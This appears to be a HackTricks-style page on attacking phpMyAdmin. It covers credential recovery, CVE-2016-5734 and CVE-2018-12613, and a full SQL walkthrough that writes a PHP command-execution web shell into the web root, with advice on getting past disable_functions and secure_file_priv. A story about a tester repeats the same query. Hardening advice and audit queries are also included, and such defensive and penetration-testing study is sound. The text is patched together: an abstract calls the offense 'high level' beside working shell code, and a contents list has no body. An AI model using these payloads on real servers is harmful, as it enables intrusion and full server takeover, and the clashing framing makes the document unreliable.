phpMyAdmin HackTricks
Unlike a blind SQL injection, which means writing custom scripts, dodging a WAF and extracting data one character at a time, phpMyAdmin hands the attacker a full, interactive SQL console. From an attacker's perspective it is the equivalent of finding the server-room door unlocked.
The primary attack vectors fall into three categories: weak or recoverable credentials (default logins, a config.inc.php backup left in the web directory, an exposed setup/ directory), known vulnerabilities in phpMyAdmin itself, and post-authentication abuse of whatever database privileges the session holds.

Vulnerabilities in phpMyAdmin itself: in the 4.6.x branch before 4.6.3 (and in 4.4.x before 4.4.15.7 and 4.0.x before 4.0.10.16), CVE-2016-5734 let an authenticated user reach preg_replace() with a user-controlled pattern through the table find-and-replace feature. On PHP older than 5.4.7 a null byte in the pattern lets the attacker append the /e modifier, so the replacement string is evaluated as PHP code. The bug needs nothing beyond an authenticated session. $cfg['AllowArbitraryServer']=true is not required, but it removes the need for the target's credentials: the login form then accepts any MySQL host, so an attacker can authenticate against a server they control and exploit the bug from that session.

Abuse of FILE privileges: if the database user phpMyAdmin connects as holds the FILE privilege, SELECT ... INTO OUTFILE can write a PHP shell directly to the web root (and LOAD_FILE() can read any file the mysqld process can open).

Steps:
1. Confirm the privilege with SHOW GRANTS FOR CURRENT_USER(); FILE is a global privilege, so look for GRANT FILE ON *.* or GRANT ALL PRIVILEGES ON *.*.
2. Check SELECT @@secure_file_priv. NULL means file operations are disabled, an empty string means no restriction, and a path confines reads and writes to that directory (MySQL 5.7+ packages commonly default to /var/lib/mysql-files/, which no web server serves).
3. Find a directory under the web root that the mysqld OS user can write to. INTO OUTFILE never overwrites an existing file, and on Ubuntu the AppArmor profile for mysqld blocks writes outside the paths it allows even when FILE is granted.
4. Write the shell and request it through the web server; it runs as the web server's OS user, not as mysql.

Common paths to try: /var/www/html/ (Debian and Ubuntu Apache packages), /var/www/ (older Debian layouts), /usr/share/nginx/html/ (RHEL-family nginx packages), /srv/http/ (Arch), C:\xampp\htdocs\ (XAMPP) and C:\inetpub\wwwroot\ (IIS).

HackTricks reminds us that even with only a low-privileged database account, phpMyAdmin itself has had nasty remote code execution bugs (CVE-2016-5734 above, and the CVE-2018-12613 file inclusion discussed in the walkthrough later on this page).

These show why a fully patched phpMyAdmin matters: an exposed, unpatched instance is a disaster waiting to happen.

If PHP is hardened and system() is listed in disable_functions, try the other process-spawning functions (exec, shell_exec, passthru, popen, proc_open) before concluding that code execution is blocked; each one is disabled separately.
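The FILE-privilege route sketched above under "Steps" and "Common paths to try" is the same sequence Alex follows in the walkthrough later on this page. As an added example, not code from the original page or from HackTricks, here it is written out in full as the queries a tester would paste into the phpMyAdmin SQL tab, together with the checks that decide whether the write can succeed at all. The web root /var/www/html/, the file names, and the host in http://target/ are assumptions.

```sql
-- Added example, not code from the original page or from HackTricks.
-- Assumptions: Apache with its web root at /var/www/html/, a MySQL user that
-- holds FILE, and a target reachable as http://target/ (placeholder host).

-- 1. Does this session hold FILE?  It is a global privilege, so it shows up as
--    'GRANT FILE ON *.*' or as part of 'GRANT ALL PRIVILEGES ON *.*'.
SHOW GRANTS FOR CURRENT_USER();

-- 2. Where is the server allowed to touch the file system?
--    NULL  -> LOAD_FILE / INTO OUTFILE are disabled outright
--    ''    -> anywhere the mysqld OS user may read or write
--    path  -> only inside that directory (MySQL 5.7+ packages commonly default
--             to /var/lib/mysql-files/, which no web server serves)
SELECT @@secure_file_priv, @@datadir, @@version, @@version_compile_os;

-- 3. Prove FILE works with a read before trying a write.  A NULL result means
--    no privilege, a secure_file_priv block, an unreadable file, or a file
--    larger than max_allowed_packet.
SELECT LOAD_FILE('/etc/passwd');

-- 4. Write the shell.  INTO OUTFILE never overwrites an existing file, so pick
--    an unused name.  The file is created by the mysqld OS user, so the
--    directory must be writable by that user (and permitted by the AppArmor
--    profile on Ubuntu).
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

-- 5. When system() is in disable_functions, swap in another function (each is
--    blocked independently).  INTO DUMPFILE writes the single value
--    byte-for-byte with no escaping and no trailing newline; INTO OUTFILE
--    escapes backslashes and appends '\n', which corrupts binaries.
SELECT '<?php echo shell_exec($_GET["cmd"]); ?>' INTO DUMPFILE '/var/www/html/shell2.php';

-- Then request http://target/shell.php?cmd=id ; the output is produced as the
-- web server's OS user (www-data on Debian/Ubuntu), not as mysql.
```

Run steps 1 to 3 first: most failed attempts on modern packages are not a missing FILE privilege but a secure_file_priv path that points outside the web root, and no amount of guessing web-root paths gets around that.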
This paper surveys common attack techniques, defensive mitigations, and secure administration practices related to phpMyAdmin — a widely used web-based MySQL/MariaDB administration tool. It aims to help system administrators, security engineers, and auditors understand typical threat vectors, exploit patterns, detection strategies, and hardening recommendations. The focus is on pragmatic, ethical guidance for securing deployments and auditing risk; offensive techniques are described at a high level to inform defenses only.
7.1. Network-Level Controls
7.2. Authentication & Access Control
7.3. HTTPS & Session Security
7.4. Principle of Least Privilege (PoLP)
7.5. Keep Software Updated
7.6. Disable Unused Features
7.7. File and Upload Protections
7.8. Configuration Management
7.9. Use Read-Only or Limited Interfaces for Routine Tasks
7.10. Backup & Recovery
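Sections 7.4 (least privilege) and 7.6 (disable unused features) are listed above without detail. As an added example, not taken from the page or from the phpMyAdmin project, here is the MySQL side of that hardening: queries that audit who can touch the file system through the database, and a restricted account for phpMyAdmin to connect with. The account names app and pma_app, the schema appdb, and the password are placeholders.

```sql
-- Added example, not code from the original page or from the phpMyAdmin project.
-- Run as a MySQL administrator.  'app', 'pma_app', 'appdb' and the password are
-- placeholders.

-- Who can read or write files on the database host through SQL?
-- FILE is global (ON *.*) and is recorded in mysql.user.  SUPER is listed too
-- because it allows changing global log-file paths at runtime, another way to
-- land a file under the web root.
SELECT user, host, File_priv, Super_priv
  FROM mysql.user
 WHERE File_priv = 'Y' OR Super_priv = 'Y';

-- Anonymous accounts and accounts accepted from any host turn a reachable
-- phpMyAdmin login form into an open door.
SELECT user, host
  FROM mysql.user
 WHERE user = '' OR host = '%';

-- Are file operations fenced to a directory no web server serves?  NULL is the
-- safest value; '' means unrestricted.  It is read-only at runtime, so set it
-- in my.cnf and restart mysqld.
SELECT @@secure_file_priv;

-- Strip FILE from an account that does not need it.
REVOKE FILE ON *.* FROM 'app'@'localhost';

-- A dedicated account for routine phpMyAdmin use: data access on one schema,
-- no FILE, no SUPER, no rights on mysql.*, accepted only from the local host.
CREATE USER 'pma_app'@'localhost' IDENTIFIED BY 'replace-with-a-long-random-secret';
GRANT SELECT, INSERT, UPDATE, DELETE ON appdb.* TO 'pma_app'@'localhost';

-- Verify the result from the new account's point of view, the way an attacker
-- who lands in that session would.
SHOW GRANTS FOR 'pma_app'@'localhost';
```

The audit queries are exactly what an attacker with read access to mysql.user would run, so run them first; the account that phpMyAdmin uses for day-to-day work should never show up in the first result.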
This is a story about Alex, a security researcher who used the HackTricks methodology to turn a forgotten database portal into a complete system takeover.

The Discovery
During a routine authorized assessment, Alex found a web server with a standard login page at /phpmyadmin. Many admins leave this tool exposed to the public internet, and it often serves as a primary entry point for attackers. Alex tried common credentials such as admin:password, but none of them worked. He then checked for a config.inc.php.bak file, a common mistake in which a backup containing the plain-text database password is left inside the web directory. He found nothing, but he didn't give up.

The Breakthrough
Alex remembered a specific trick from the HackTricks pentesting guide: checking for setup scripts left over from the default configuration. He navigated to /phpmyadmin/setup/. Modern versions block this, but this older server let him see the configuration, which gave him what he needed to log in. The instance was also running a version affected by CVE-2018-12613, a local file inclusion bug in phpMyAdmin 4.8.0 and 4.8.1 that lets an authenticated user include arbitrary local files through the target parameter of index.php. Alex ran a query containing a short piece of PHP, which phpMyAdmin stored in his session file, then included that session file through the LFI so the server executed the "poisoned" code.

From Database to Shell
Once he had authenticated, Alex didn't just want the data; he wanted the server. He followed these steps:
Checking privileges: he verified that his database user held the FILE privilege, which is required to read or write files on the server.
The "Into Outfile" trick: he used a SQL command to write a simple web shell into the web root:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"
Command execution: by requesting http://example.com/shell.php with a command in the cmd parameter, he confirmed that his commands ran as the web server's user.

The Lesson
Alex's report helped the company understand that tools like phpMyAdmin should never be exposed to the public. To prevent this, he recommended:
Restricting access: web server access controls or firewall rules that only allow specific IP addresses.
Changing the URL: moving the interface from /phpmyadmin to a random, obscure path. This only cuts down automated scanning and is no substitute for the access restriction above.
Keeping it updated: always running the latest version to patch known LFI and RCE vulnerabilities.

